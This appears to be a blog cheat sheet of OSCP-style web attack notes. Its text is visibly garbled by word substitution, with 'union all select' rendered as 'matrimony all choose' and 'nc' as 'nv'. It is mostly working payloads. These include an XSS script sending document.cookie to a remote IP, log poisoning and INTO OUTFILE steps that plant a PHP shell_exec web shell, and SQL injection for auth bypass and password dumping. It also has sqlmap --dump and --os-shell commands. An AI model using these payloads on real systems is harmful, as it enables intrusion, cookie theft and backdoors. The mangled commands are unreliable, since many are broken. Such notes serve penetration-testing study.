-->

Oscp - Spider Web Applications

Oscp - Spider Web Applications

General

Try reading the php source code of the spider web application:
http://<ip>/script.php/?-s
Do you lot come across whatever LFI/RFI vulnerability posted past times Nikto? Try
fimap -u <ip-address>
Check for Input Validation inward forms:
1′ or 1=1 trammel 1;#   AND   1′ or 1=1--)

Stealing Cookies

<iframe src="http://10.11.0.5/report" pinnacle = "0" width = "0"></iframe>
<script> novel Image().src="http://10.11.0.5/bogus.php?output="+document.cookie; </script>

File Inclusion Vulnerabilities

php.ini values:
register_globals allow_url  allow_url_fopen allow_url_include 
terminate our asking alongside a cipher byte () (possible inward php below 5.3)
For LFI/RFI attacks, this powerfulness endure useful:
https://github.com/lightos/Panoptic/

Contaminating Log Files

contaminate log file to movement them to incorporate PHP code to endure afterwards used inward LFI assail
nv -nv 192.168.30.35 lxxx <?php echo shell_exec($_GET['cmd']);?>
thus, cmd= is introduced into the php execution in addition to straight off past times including the logfile you lot tin flame execute whatever ascendance

SQL Injection

Classic Authentication Bypass
select * from users where cite ='any' or 1=1;#' 
select * from users where cite ='any' or 1=1 trammel 1;#' 

Error Based Enum

gild past times
matrimony all operator → allows us to add together our ain choose queries to the master copy but the novel choose needs to bring the same discover of columns every bit the master copy columns contestation
union all choose 1,2,3,4,5,6 matrimony all choose 1,2,3,4,@@version,6 matrimony all choose 1,2,3,4,user(),6
union all choose 1,2,3,4,table_name,6 FROM information_schema.tables
union all choose 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union choose 1,2,name,4,password,6 FROM users
OR
http://10.11.1.35/comment.php?id=738 matrimony choose 1,2,3,4,concat(name,0x3a,password),6 FROM users

Blind SQL Injection

and 1=1;# in addition to 1=2;#
if they bring dissimilar results in addition to so it is an indication of possible injection location
role fourth dimension every bit a exam parameter for enquiry
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all choose 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 matrimony all choose 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

SQLMap

sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell

Modify HTTP Headers

Install addon “Modify Headers”
In simply about cases, to await similar you lot bring a dissimilar IP, you lot tin flame alter the value of the X-Forwarded-For
https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser